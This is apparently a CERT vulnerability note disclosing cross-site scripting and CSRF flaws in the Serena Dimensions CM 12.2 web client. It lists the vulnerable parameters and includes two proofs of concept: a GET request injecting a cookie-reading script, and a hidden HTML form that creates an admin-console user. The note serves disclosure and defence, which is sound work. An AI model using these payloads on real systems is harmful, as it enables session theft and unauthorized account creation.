Vulnerability Note VU#823452

Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities

Original Release date: 05 Mar 2014 | Last revised: 05 Mar 2014

Overview

Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.

Description

Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335

    #Unauthenticated vulnerable parameters
    /dimensions/ [DB_CONN parameter]
    /dimensions/ [DB_NAME parameter]
    /dimensions/ [DM_HOST parameter]
    /dimensions/ [MAN_DB_NAME parameter]


    #Authenticated vulnerable parameters
    /dimensions/ [framecmd parameter]
    /dimensions/ [identifier parameter]
    /dimensions/ [identifier parameter]
    /dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
    /dimensions/ [nav_frame parameter]
    /dimensions/ [nav_jsp parameter]
    /dimensions/ [target_frame parameter]
    /dimensions/ [id parameter]
    /dimensions/ [type parameter]


    Proof-of-Concept:
    GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1


CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336
    Proof-of-Concept:
    <html>

    <!-- CSRF PoC -->

    <body>

    <form
    action="
    http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
    User&create=yes" method="POST">
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;dept" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;id" value="HACKTEST1" />
    <input type="hidden" name="USER&#95;CURWORKSET" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />

    <input type="hidden" name="isUserEdit" value="false" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;site" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;phone" value="" />
    <input type="hidden" name="AUTOMATIC&#95;LOGIN" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;group&#95;id" value="" />
    <input type="hidden" name="null" value="" />
    <input type="hidden" name="DIALOG&#95;MODE" value="MODE&#37;5fCREATE" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;full&#95;name" value="HACKTEST1" />

    <input type="hidden" name="projectPicker" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />
    <input type="hidden" name="wait&#95;until&#95;loaded" value="" />
    <input type="hidden" name="projectPickerUid" value="1" />
    <input type="hidden" name="GROUPS&#95;ASSIGNED" value="" />
    <input type="hidden" name="&#45;AdmAttrNames&#46;email"
    value="ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl" />

    <input type="submit" value="Submit request" />
    </form>
    </body>

Impact

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session.

Solution

We are currently unaware of a practical solution to this problem.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
SERENA Software IncUnknown-04 Mar 2014
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base 7.1 AV:N/AC:M/Au:N/C:C/I:N/A:N
Temporal 5.4 E:U/RL:U/RC:UC
Environmental 1.5 CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

Credit

Thanks to Ken Cijsouw for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

  • CVE IDs: CVE-2014-0335 CVE-2014-0336
  • Date Public: 07 Mar 2014
  • Date First Published: 05 Mar 2014
  • Date Last Updated: 05 Mar 2014
  • Document Revision: 7

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.